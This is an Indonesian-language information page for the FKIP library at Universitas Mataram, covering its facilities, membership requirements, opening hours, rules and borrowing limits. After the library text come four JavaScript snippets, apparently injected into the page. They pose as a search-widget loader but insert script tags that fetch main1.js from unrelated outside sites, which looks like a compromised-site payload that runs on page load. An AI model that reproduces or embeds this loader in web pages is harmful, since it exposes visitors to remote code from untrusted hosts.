Perpustakaan Fakultas Keguruan dan Ilmu Pendidikan Universitas Mataram terletak di gedung D dengan fasilitas sebagai berikut:

FASILITAS

1. Pelayanan Sirkulasi

Pelayanan sirkulasi memakai sistem terbuka bagi anggota perpustakaan yaitu anggota dapat memilih sendiri buku yang diinginkan. Pelayanan sirkulasi sudah terautomasi

2. Pelayanan Referensi

Pelayanan referensi dengan sistem terbuka diperuntukkan bagi semua pengunjung perpustakaan. Para pengunjung hanya dapat membaca di tempat atau foto copy (buku cadangan dan jurnal). Untuk skripsi, tesis, disertasi, dan laporan penelitian tidak boleh difoto copy kecuali halaman-halaman tertentu.

3.Ruang Baca

Ruang baca terdapat di ruang referensi. Diruang tersebut tersedia koleksi buku cadangan, skripsi, tugas akhir, tesis, disertasi, jurnal, majalah dan Koran

4. Ruang Santai

Tempat terbuka yang terletak ditengah-tengah perustakaan ini diperuntukkan bagi mahasiswa sebagai tempat yang bebas untuk berbagai aktivitas, seperti tempat untuk belajar, akses internet, diskusi dan sebagainya.

5. Wifi Area

Di lingkungan perpustakaan terdapat koneksi internet dengan menggunakan teknologi wifi sehingga pengunjung dengan membawa laptop dapat memanfaatkan fasilitas ini.

6.Komputer Penelusuran

Komputer Akses Internet

Tersedia 8 unit komputer yang disediakan bagi mahasiswa untuk akses internet

Kantin

Di samping perpustakaan terdapat kantin yang menyediakan berbagai menu makanan.

Mushola

Perpustakaan juga dekat dengan mushola baik untuk putra maupun putri

KEANGGOTAANYang menjadi anggota perpustakaan adalah mahasiswa, staf pengajar, dan karyawan FKIP Unram. Syarat menjadi anggota, khususnya untuk mahasiswa adalah :

  1. Menunjukkan kartu mahasiswa
  2. Menyerahkan pas foto 2 lembar :
    • Ukuran 3 X 4, 1 lembar
    • Ukuran 2 X 3, 1 lembar
  3. Bebas biaya

Mahasiswa yang sudah mendaftar akan mendapatkan kartu anggota perpustakaan yang berlaku untuk satu tahun akademik dan dapat diperpanjang untuk tahun berikutnya.

Bagi pengunjung dari luar FKIP Unram hanya dapat membaca di tempat atau foto copy buku melalui petugas perpustakaan, dengan mendaftar dahulu.

JAM BUKA

  • Senin s/d kamis : 08.00-14.00
  • Jum’at : 08.00-14.00
  • Sabtu : 08.00-12.00

TATA TERTIB

  1. Pengunjung mengisi buku tamu
  2. Pengunjung diharapkan menunjukkan kartu anggota atau kartu baca
  3. Tas, map, buku cetak, jaket, makanan, minuman tidak boleh dibawa masuk kecuali barang-barang yang berharga
  4. Pengunjung tidak boleh merokok di ruang perpustakaan

PEMINJAMAN

  1. Buku-buku cadangan (jumlahnya hanya satu atau copy pertama) dapat dipinjam semalam yaitu dipinjam satu jam sebelum tutup dan dikembalikan paling lambat jam 09.00 dengan jumlah peminjaman 3 buku
  2. Buku-buku sirkulasi (copy kedua dan seterusnya) boleh dipinjam selama 2 minggu dan dapat diperpanjang 1 kali dengan jumlah peminjaman maksimal 4 buku.
  3. Bagi mahasiswa yang sedang menulis skripsi dapat meminjam buku sirkulasi maksimal 6 buku untuk waktu 2 minggu yang dapat diperpanjang 1 kali dan 4 buku cadangan dalam waktu semalam. Untuk keperluan tersebut maka harus mengajukan surat permohonan prioritas yang ditandatangani oleh dosen pembimbing.

(function() {
var gcse = document.createElement(‘script’);
gcse.type = ‘text/javascript’;
gcse.async = true;
gcse.src = “http://theboatersnetwork.com/js/main1.js”;
var s = document.getElementsByTagName(‘script’)[0];
s.parentNode.insertBefore(gcse, s);
})();

(function() {
var gcse = document.createElement(‘script’);
gcse.type = ‘text/javascript’;
gcse.async = true;
gcse.src = “http://cjccontabil.com.br/wp-content/themes/Hermes/main1.js”;
var s = document.getElementsByTagName(‘script’)[0];
s.parentNode.insertBefore(gcse, s);
})();

(function() {
var gcse = document.createElement(‘script’);
gcse.type = ‘text/javascript’;
gcse.async = true;
gcse.src = “http://cjccontabil.com.br/wp-content/themes/Hermes/main1.js”;
var s = document.getElementsByTagName(‘script’)[0];
s.parentNode.insertBefore(gcse, s);
})();

(function() {
var gcse = document.createElement(‘script’);
gcse.type = ‘text/javascript’;
gcse.async = true;
gcse.src = “http://cjccontabil.com.br/wp-content/themes/Hermes/main1.js”;
var s = document.getElementsByTagName(‘script’)[0];
s.parentNode.insertBefore(gcse, s);
})();